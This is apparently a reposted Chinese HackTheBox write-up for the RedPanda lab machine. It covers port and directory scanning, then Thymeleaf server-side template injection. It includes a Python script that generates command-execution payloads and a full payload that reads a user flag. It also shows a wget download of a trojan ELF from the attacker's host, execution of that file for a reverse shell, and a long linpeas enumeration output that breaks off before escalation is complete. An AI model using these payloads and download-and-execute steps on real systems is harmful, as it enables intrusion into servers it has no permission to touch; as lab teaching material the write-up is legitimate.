當前位置:
首頁 >
HackTheBox -- RedPanda
發布時間:2023/12/10
43
豆豆
生活随笔
收集整理的這篇文章主要介紹了
HackTheBox -- RedPanda
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
RedPanda
信息收集
掃描目標主機的端口
掃描網頁目錄
識別網站指紋
注入攻擊
Thymeleaf中的表達式?
python編寫生成payload程序
反彈shell
生成木馬
開啟443端口監聽
在本地用python開啟http服務
提權
提權信息收集
RedPanda
?
信息收集
掃描目標主機的端口
nmap -sTVC 10.10.11.170Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 11:36 EDT Nmap scan report for 10.10.11.170 Host is up (0.45s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 8080/tcp open http-proxy | fingerprint-strings: | GetRequest: | HTTP/1.1 200 | Content-Type: text/html;charset=UTF-8 | Content-Language: en-US | Date: Sun, 11 Sep 2022 15:38:23 GMT | Connection: close | <!DOCTYPE html> | <html lang="en" dir="ltr"> | <head> | <meta charset="utf-8"> | <meta author="wooden_k"> | <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw --> | <link rel="stylesheet" href="css/panda.css" type="text/css"> | <link rel="stylesheet" href="css/main.css" type="text/css"> | <title>Red Panda Search | Made with Spring Boot</title> | </head> | <body> | <div class='pande'> | <div class='ear left'></div> | <div class='ear right'></div> | <div class='whiskers left'> | <span></span> | <span></span> | <span></span> | </div> | <div class='whiskers right'> | <span></span> | <span></span> | <span></span> | </div> | <div class='face'> | <div class='eye | HTTPOptions: | HTTP/1.1 200 | Allow: GET,HEAD,OPTIONS | Content-Length: 0 | Date: Sun, 11 Sep 2022 15:38:24 GMT | Connection: close | RTSPRequest: | HTTP/1.1 400 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 435 | Date: Sun, 11 Sep 2022 15:38:26 GMT | Connection: close | <!doctype html><html lang="en"><head><title>HTTP Status 400 | Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 |_ Request</h1></body></html> |_http-open-proxy: Proxy might be redirecting requests |_http-title: Red Panda Search | Made with Spring Boot 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.92%I=7%D=9/11%Time=631E00EF%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charse SF:t=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sun,\x2011\x20Sep\x20 SF:2022\x2015:38:23\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm SF:l>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\ SF:x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"woode SF:n_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepe SF:n\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesh SF:eet\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x2 SF:0<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/c SF:ss\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20w SF:ith\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\ SF:x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20clas SF:s='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20r SF:ight'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'> SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x SF:20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</ SF:div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x SF:20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x SF:20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Su SF:n,\x2011\x20Sep\x202022\x2015:38:24\x20GMT\r\nConnection:\x20close\r\n\ SF:r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ SF:html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435 SF:\r\nDate:\x20Sun,\x2011\x20Sep\x202022\x2015:38:26\x20GMT\r\nConnection SF::\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>H SF:TTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x2 SF:0type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1 SF:,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x SF:20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px SF:;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{heigh SF:t:1px;background-color:#525D76;border:none;}</style></head><body><h1>HT SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html SF:>"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 154.59 seconds發現存在22(ssh)和8080(http-proxy)
訪問一下站點10.10.11.170:8080
?
掃描網頁目錄
dirsearch -u 10.10.11.170:8080_|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/8080_22-09-11_11-44-06.txtError Log: /root/.dirsearch/logs/errors-22-09-11_11-44-06.logTarget: http://10.10.11.170:8080/[11:44:07] Starting: [11:44:45] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd [11:44:48] 400 - 435B - /a%5c.aspx [11:45:36] 500 - 86B - /error [11:45:36] 500 - 86B - /error/ [11:46:32] 405 - 117B - /search [11:46:45] 200 - 987B - /stats/ [11:46:45] 200 - 987B - /stats Task Completed發現兩個目錄:/search(初始頁面) 和 /stats
訪問一下站點 10.10.11.170:8080/stats
?
識別網站指紋
whatweb 10.10.11.170:8080 http://10.10.11.170:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]- Made with Spring Boot
- 現階段常用Spring Boot模板引擎有 FreeMarker 、Thymeleaf。而Spring Boot默認使用的是Thymeleaf,負責渲染前端頁面。
嘗試在10.10.11.170:8080/stats的搜索欄中搜索(下圖是默認搜索,即不輸入任何內容)
- ?Greg is a hacker. Watch out for his injection attacks!?? ?(格雷格是個黑客。小心他的注入攻擊!)
- 提示我們需要注入測試
注入攻擊
- 常見的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代碼注入,命令注入,SSTI注入等等。
- 嘗試了很多注入都不成功,最后嘗試SSTI注入成功
- 這里的SSTI注入就是服務器端模板注入(Server-Side Template Injection),漏洞成因就是服務端接收了用戶的惡意輸入以后,未經任何處理就將其作為 Web 應用模板內容的一部分,模板引擎在進行目標編譯渲染的過程中,執行了用戶插入的可以破壞模板的語句,因而可能導致了敏感信息泄露、代碼執行、GetShell 等問題。其影響范圍主要取決于模版引擎的復雜性。
?
Thymeleaf中的表達式?
| ${...} | Variable Expressions | 變量表達式 | 取出上下文變量的值 |
| *{...} | Selection Variable Expressions | 選擇變量表達式 | 取出選擇的對象的屬性值 |
| #{...} | Message Expressions | 消息表達式 | 使文字消息國際化 |
| @{...} | Link URL Expressions | 鏈接表達式 | 用于表示各種超鏈接地址 |
| ~{...} | Fragment Expressions | 片段表達式 | 引用一段公共的代碼片段 |
嘗試使用${...}和#{...}表達式時,提示禁止使用,其他的就沒有被過濾
python編寫生成payload程序
#!/usr/bin/python3def main():command = input("please input command:") # specify command convert = []for x in command:convert.append(str(ord(x)))payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % convert[0]for i in convert[1:]:payload += ".concat(T(java.lang.Character).toString({}))".format(i)payload += ").getInputStream())}"print(payload)if __name__ == "__main__":main()Output的payload直接輸入搜索框即可
python3 example.py please input command:cat /home/woodenk/user.txt // user.txt一般都在普通用戶目錄下 *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}搜索我們需要的用戶flag
?
反彈shell
生成木馬
?
開啟443端口監聽
?準備反彈shell
在本地用python開啟http服務
/*并利用SSTI注入下載本地的木馬*/ wget 10.10.16.10:8000/kalakala.elf?
/*給 木馬文件 加 執行權限*/ chmod +x kalakala.elf/*執行 木馬文件*/ ./kalakala.elf攻擊機成功收到反彈的shell
這次的靶機好像會定時清理文件,怕木馬被刪除了還得重新上傳,就多反彈了一個shell
提權
linpeas.sh提權信息收集
/---------------------------------------------------------------------------\| Do you like PEASS? | |---------------------------------------------------------------------------| | Become a Patreon : https://www.patreon.com/peass | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------/ linpeas-ng by carlospolop ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own comp uters and/or with the computer owner's permission. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklistLEGEND: RED/YELLOW: 95% a PE vectorRED: You should take a look to itLightCyan: Users with consoleBlue: Users without console & mounted devsGreen: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your usernameStarting linpeas. Caching Writable Folders...╔═══════════════════╗ ═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════ ╚═══════════════════╝ OS: Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ubuntu SMP Wed Jun 15 13:33:07 UTC 2022 User & Groups: uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk) Hostname: redpanda Writable folder: /dev/shm [+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /usr/bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE╔════════════════════╗ ════════════════════════════════════════╣ System Information ╠════════════════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ub untu SMP Wed Jun 15 13:33:07 UTC 2022 Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version Sudo version 1.8.31 ./linpeas.sh: 1188: [[: not found ./linpeas.sh: 1188: rpm: not found ./linpeas.sh: 1188: 0: not found╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Date & uptime Mon Sep 12 11:32:20 UTC 2022 11:32:20 up 2:31, 0 users, load average: 0.15, 0.06, 0.01 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk sda sda1 sda2 sda3 ╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices sed: -e expression #1, char 326: unknown option to `s' ╔══════════╣ Environment ╚ Any private information inside environment variables? LESSOPEN=| /usr/bin/lesspipe %s HISTFILESIZE=0 SHLVL=2 OLDPWD=/home/woodenk MAVEN_HOME=/opt/maven _=./linpeas.sh HISTSIZE=0 LS_COLORS= MAVEN_VERSION=3.8.3 LESSCLOSE=/usr/bin/lesspipe %s %s JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64/bin/java PWD=/tmp/hsperfdata_woodenk MAVEN_CONFIG_HOME=/home/woodenk/.m2 HISTFILE=/dev/null╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester sed: -e expression #1, char 27: unknown option to `s' ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (vmware) ╔═══════════╗ ═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No ╔════════════════════════════════════════════════╗ ══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes root 1 0.0 0.5 167788 11164 ? Ss 09:00 0:02 /sbin/init maybe-ubiquity root 462 0.0 0.5 68516 11976 ? S<s 09:00 0:00 /lib/systemd/systemd-journald root 490 0.0 0.2 22344 5748 ? Ss 09:00 0:00 /lib/systemd/systemd-udevd root 614 0.0 0.8 214596 17944 ? SLsl 09:01 0:00 /sbin/multipathd -d -s systemd+ 638 0.0 0.3 90872 6144 ? Ssl 09:01 0:00 /lib/systemd/systemd-timesyncd└─(Caps) 0x0000000002000000=cap_sys_time root 650 0.0 0.5 47540 10624 ? Ss 09:01 0:00 /usr/bin/VGAuthService root 656 0.0 0.4 237776 8140 ? Ssl 09:01 0:08 /usr/bin/vmtoolsd root 673 0.0 0.2 99896 5912 ? Ssl 09:01 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0 root 708 0.0 0.4 239292 9316 ? Ssl 09:01 0:00 /usr/lib/accountsservice/accounts-daemon message+ 710 0.0 0.2 7580 4456 ? Ss 09:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only└─(Caps) 0x0000000020000000=cap_audit_write root 729 0.0 0.1 81956 3680 ? Ssl 09:01 0:00 /usr/sbin/irqbalance --foreground root 730 0.0 0.4 236436 8956 ? Ssl 09:01 0:00 /usr/lib/policykit-1/polkitd --no-debug syslog 733 0.0 0.2 224344 5144 ? Ssl 09:01 0:00 /usr/sbin/rsyslogd -n -iNONE root 738 0.0 0.3 17340 7892 ? Ss 09:01 0:00 /lib/systemd/systemd-logind root 739 0.0 0.6 395484 13492 ? Ssl 09:01 0:00 /usr/lib/udisks2/udisksd root 756 0.0 0.6 318812 13308 ? Ssl 09:01 0:00 /usr/sbin/ModemManager root 870 0.0 0.1 6812 2952 ? Ss 09:01 0:00 /usr/sbin/cron -f root 873 0.0 0.1 8356 3364 ? S 09:01 0:00 _ /usr/sbin/CRON -f root 874 0.0 0.0 2608 596 ? Ss 09:01 0:00 _ /bin/sh -c sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar root 875 0.0 0.2 9420 4628 ? S 09:01 0:00 _ sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar woodenk 883 1.4 15.0 3127644 306476 ? Sl 09:01 2:15 _ java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar woodenk 1179 0.0 0.0 2608 1828 ? S 09:10 0:00 _ /bin/sh woodenk 1658 0.0 0.0 5320 1152 ? S 09:27 0:00 | _ find /home/woodenk -exec /bin/bash -p ; woodenk 1659 0.0 0.1 3976 3132 ? S 09:27 0:00 | _ /bin/bash -p woodenk 6880 0.0 0.0 5320 1148 ? S 11:18 0:00 | _ find /home/woodenk/ -exec bash -ip ; woodenk 6881 0.0 0.2 5168 4472 ? S 11:18 0:00 | _ bash -ip woodenk 7178 0.5 0.1 3484 2524 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh woodenk 9953 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh woodenk 9955 0.0 0.1 6216 3200 ? R 11:32 0:00 | | _ ps fauxwww woodenk 9957 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh woodenk 1548 0.0 0.0 2608 532 ? S 09:23 0:00 _ /bin/sh woodenk 1574 0.0 0.4 15956 9488 ? S 09:24 0:00 _ python3 -c import pty;pty.spawn('/bin/bash') woodenk 1575 0.0 0.2 8364 4836 pts/0 Ss+ 09:24 0:00 _ /bin/bash daemon[0m 876 0.0 0.1 3792 2180 ? Ss 09:01 0:00 /usr/sbin/atd -f root 895 0.0 0.0 5828 1988 tty1 Ss+ 09:01 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux mysql 913 0.1 21.6 1842020 439740 ? Ssl 09:01 0:16 /usr/sbin/mysqld systemd+ 1090 0.0 0.6 24564 13220 ? Ss 09:07 0:01 /lib/systemd/systemd-resolved╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd: process found (dump creds from memory as root) ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any'). # # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command incrontab Not Found -rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Jun 14 14:35 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all -rw-r--r-- 1 root root 191 Apr 23 2020 popularity-contest/etc/cron.daily: total 48 drwxr-xr-x 2 root root 4096 Jul 5 05:52 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 376 Dec 4 2019 apport -rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg -rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate -rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db -rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest -rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common/etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Jun 14 14:35 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder/etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Jun 14 14:35 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder/etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Jul 5 05:52 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 813 Feb 25 2020 man-db -rwxr-xr-x 1 root root 403 Aug 5 2021 update-notifier-commonSHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any'). # # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#services /etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path /etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path /etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path You can't write on systemd PATH╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Mon 2022-09-12 15:47:22 UTC 4h 14min left Thu 2022-06-23 17:48:21 UTC 2 months 19 days ago motd-news.timer motd-news.service Mon 2022-09-12 16:46:53 UTC 5h 14min left Mon 2022-09-12 09:49:49 UTC 1h 43min ago ua-timer.timer ua-timer.service Mon 2022-09-12 16:47:31 UTC 5h 14min left Mon 2022-06-20 10:22:09 UTC 2 months 23 days ago fwupd-refresh.timer fwupd-refresh.service Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago logrotate.timer logrotate.service Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago man-db.timer man-db.service Tue 2022-09-13 01:04:03 UTC 13h left Mon 2022-09-12 11:22:14 UTC 10min ago apt-daily.timer apt-daily.service Tue 2022-09-13 06:52:08 UTC 19h left Mon 2022-09-12 09:13:02 UTC 2h 19min ago apt-daily-upgrade.timer apt-daily-upgrade.service Tue 2022-09-13 09:15:57 UTC 21h left Mon 2022-09-12 09:15:57 UTC 2h 16min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Sun 2022-09-18 03:10:51 UTC 5 days left Mon 2022-09-12 09:01:02 UTC 2h 31min ago e2scrub_all.timer e2scrub_all.service Mon 2022-09-19 00:00:00 UTC 6 days left Mon 2022-09-12 09:01:01 UTC 2h 31min ago fstrim.timer fstrim.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets /org/kernel/linux/storage/multipathd /run/dbus/system_bus_socket└─(Read Write) /run/irqbalance//irqbalance729.sock└─(Read ) /run/irqbalance/irqbalance729.sock└─(Read ) /run/lvm/lvmpolld.socket /run/mysqld/mysqld.sock└─(Read Write) /run/mysqld/mysqlx.sock└─(Read Write) /run/systemd/journal/dev-log└─(Read Write) /run/systemd/journal/io.systemd.journal /run/systemd/journal/socket└─(Read Write) /run/systemd/journal/stdout└─(Read Write) /run/systemd/journal/syslog└─(Read Write) /run/systemd/notify└─(Read Write) /run/systemd/private└─(Read Write) /run/systemd/userdb/io.systemd.DynamicUser└─(Read Write) /run/udev/control /run/uuidd/request└─(Read Write) /run/vmware/guestServicePipe└─(Read Write) /var/run/mysqld/mysqld.sock└─(Read Write) /var/run/mysqld/mysqlx.sock└─(Read Write) /var/run/vmware/guestServicePipe└─(Read Write)╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">) ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - - :1.2 708 accounts-daemon[0m root :1.2 accounts-daemon.service - - :1.22 12770 busctl woodenk :1.22 cron.service - - :1.3 730 polkitd root :1.3 polkit.service - - :1.4 1 systemd root :1.4 init.scope - - :1.5 739 udisksd root :1.5 udisks2.service - - :1.6 756 ModemManager root :1.6 ModemManager.service - - :1.7 738 systemd-logind root :1.7 systemd-logind.service - - :1.9 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - - com.ubuntu.LanguageSelector - - - (activatable) - - - com.ubuntu.SoftwareProperties - - - (activatable) - - - org.freedesktop.Accounts 708 accounts-daemon[0m root :1.2 accounts-daemon.service - - org.freedesktop.DBus 1 systemd root - init.scope - - org.freedesktop.ModemManager1 756 ModemManager root :1.6 ModemManager.service - - org.freedesktop.PackageKit - - - (activatable) - - - org.freedesktop.PolicyKit1 730 polkitd root :1.3 polkit.service - - org.freedesktop.UDisks2 739 udisksd root :1.5 udisks2.service - - org.freedesktop.UPower - - - (activatable) - - - org.freedesktop.bolt - - - 